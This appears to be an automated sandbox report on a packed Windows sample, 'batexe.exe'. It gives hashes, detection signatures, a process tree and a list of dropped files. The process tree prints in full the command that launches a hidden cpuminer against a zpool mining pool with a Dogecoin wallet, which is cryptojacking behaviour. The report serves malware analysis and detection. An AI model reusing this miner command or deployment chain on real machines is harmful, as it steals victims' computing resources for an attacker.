73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
312s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 16:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3076	b2e.exe
2092	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3388-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3388 wrote to memory of 3076	3388	batexe.exe	83
PID 3388 wrote to memory of 3076	3388	batexe.exe	83
PID 3388 wrote to memory of 3076	3388	batexe.exe	83
PID 3076 wrote to memory of 3236	3076	b2e.exe	84
PID 3076 wrote to memory of 3236	3076	b2e.exe	84
PID 3076 wrote to memory of 3236	3076	b2e.exe	84
PID 3236 wrote to memory of 2092	3236	cmd.exe	87
PID 3236 wrote to memory of 2092	3236	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3388
- C:\Users\Admin\AppData\Local\Temp\A086.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A086.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A086.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A78A.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3236
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A086.tmp\b2e.exe

Filesize
3.5MB

MD5
70e7e1875e8f4ec7b64fc4fccf2e8bc8

SHA1
94d5f094636105721308f6eeb5fdab856605dfdd

SHA256
120368a73380b6697b3aef5e01e2aba24b7d4e349bf2304140c5ef8f67cb024d

SHA512
0787baebeaf584f7b6ebaaa48334e22c9a4937dedf573fcb4702995c89756c483863ce92d4c88ba1d6a0374dae9c09f92e570eb153cc473d59a50f4822664e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\A086.tmp\b2e.exe

Filesize
3.2MB

MD5
35d614acc52ac1f063676559357ef3a0

SHA1
38bb0f406b81b4c032d7958594010287638ecd96

SHA256
397dbf36993a3df62c00ff4c243d4fa121db1cedc849f2463fde7f4b6b8005d0

SHA512
0c20d72bef049a19448ff7864f4f57a113dcbaff81dad6c45b4073cddfb9e719f5053242d98d312263a7bec791a002f26c62a24b83fc755a5ee1f47a7f8427fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\A086.tmp\b2e.exe

Filesize
3.6MB

MD5
a202c43df284047b4026052f2015b382

SHA1
531129cc3cff7410080574b0fd1f8404c8c343d6

SHA256
22e0189ee48633fcbb780d8ce081c027adcfd289ce6b90e0dddf506b78a59a66

SHA512
03192f196ccd2100255c1fad56bd14019876f87509f7215f1af469e93a9e4a8686d7bd18a1273d46e05711d1017a87948b4299a6d4597fa66001b29ee310cea2

Download Submit
C:\Users\Admin\AppData\Local\Temp\A78A.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
640KB

MD5
0f6af9e19fa927d88313e98d54420920

SHA1
0aff9c72864126107d6c630aafb9ed6512042afd

SHA256
71661d7077b93e2a5e53d7093e532bec1b66d34e3929bcb314eab7f431b84734

SHA512
bba078e2f4eb5ca45956657356f7419767a81679f34d9991bf28a1d44e412340d1002517f74a15583ffe20b32f1f25b60c47f4581100552dc1e651b3f88547be

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
580KB

MD5
a16c9127d9273a4e6817e88e696594ec

SHA1
30560d8945ef1ff62ab2fe666a367a75c4945c6a

SHA256
8221367fc0045f53391eb566a5716f30ce9662285a1e6bb05d613752ccbf7b25

SHA512
a0c4a88352a291bfd7e6331a90676e3c26fffcaf2248a3ab45283e0589fbbf980ff26ede1916581c02be8f13b214eb0bbb107fe4dc4954b1822febecf4c05c73

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
420KB

MD5
47581f1d7f9407668b8b2a07babbc7c1

SHA1
4baae6988e9684987ab105959c45adaca055425e

SHA256
edc90af06feb11b02994ea89018d780c84a7ed551c99fb90e633ae29cd80829d

SHA512
5ad5c4c7057303224365f55fd495a3e1e0b2c727bb4006c52f2e77b0eef9d9b864c948cc1c06007d8343cb2a3fddd8c32fb12f236b3f716b03a74ce0b4d24422

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
404KB

MD5
6cdc6f516fa242bbec1c5268fa502a32

SHA1
783381cf0b8aad2f6a9fab7f0953011169953fb3

SHA256
258404ded2e55625eba4ed6645654c472d8597e663ed2d7e9d393e5dc255e03c

SHA512
c30f8b990a70af915a887ec2b205863369859e673bf4e48055004665a865060be0e32199691f75e2e39b1be15a43c8fdd57bde1844ef864099c18afff813dcb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
211KB

MD5
009807be5119fe9c7553707dd8e25fb3

SHA1
1e59c7e3ceec1e478bf4f73d6204d8728f5b8e28

SHA256
bebe8748fb238ad1891ec4b75406897d0708dc6548449558eca579c2ab41af4c

SHA512
5a4d92eff8382fba03d495cf0f498b92cd2400c46d7d02a5380ad8b8d328d56266ec670bdadfa8e0f44916ae463a888cd17813e4ddcfd235cad39bcfe3beca8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
121KB

MD5
3dfa8e02b63bc244a31648b9a98467c2

SHA1
17deab3ed6a653355688cab88b173d1077d70ab2

SHA256
6c82ed73ff59b8985cce1a9e64f28d47aadc90a6d5f185c0e603d57c584fdba9

SHA512
885eabe3013d5990d8f127a6fc26a0016b04fc52bb5cce3c38f184018c543f9e6f8192e28282aaa8323d7f56bc3b1529f6ed5a574f7382459c90098d8029f9f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
353KB

MD5
8cf3af67ea9bee8c8d85de9dadcc315a

SHA1
b432f8c86bbdc0f8dc81fba6553ce429912030e0

SHA256
d8a219ddec7d3687c37f2354f0784928bd881280c4010afa1846752bf57a579f

SHA512
3ec2625480c3c86a6a44bf43d0dca45dbed4c969e4e3c7b4e31ba82e45d44d36ee58c932bb51e33c43fc6a3bb1d97a3418b948e524447d6c16c15a65ca591e3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
468KB

MD5
e2165d8ae256bca5b725846ebae9425b

SHA1
5f0fc35118898126b7a9853923134331d9ca249f

SHA256
6d9fd0f259f23504c582db0738c8d06cf9a23a15e72f19b4af700f90be23399e

SHA512
b7881daa577396ebcf60b94f5003c93728ecd8cf268da97199ac366be64031c886cada737a3eaf8166cb4ddfa042fec01dfeea8f84fe4c2fd4245624793d71bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
281KB

MD5
00de2ede4f15db0a72650251ad9d87ff

SHA1
1c23f739edbe86b7d93d032402f2390e5313dd9a

SHA256
7078a9122d384f3decb2259e911b1703ed99e0bdaf737be13f894ab2fba75d35

SHA512
54f21da9ea8a3e15bebf50074c03cbaf80d42c4917b879e3cf08176608ad802ae72b6037e6a8288637a1c37ace446bc011f413fb7450abc0c7892e61b681a5e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
416KB

MD5
222df27670da72db95f5b414b9e602cd

SHA1
fa896c0aaf7af01cdf286c2f9ade0b175732e68c

SHA256
751ce2db7a9bbf46f81a26c4e088ff29b584f0372eb5dfa2ea1ac2f70d3a1bc7

SHA512
839358e1d6a7892326f16a680f57e8f26519fbdc1721e48f3ac33f62e3724741a5637ef3d09bc1d109bb005b5bf4f0166c279df1cef3ec46bf4d05f71d6e6099

Download Submit
memory/2092-46-0x000000005EC90000-0x000000005ED28000-memory.dmp

Filesize
608KB

Download
memory/2092-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2092-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2092-47-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/2092-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3076-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3076-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3388-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download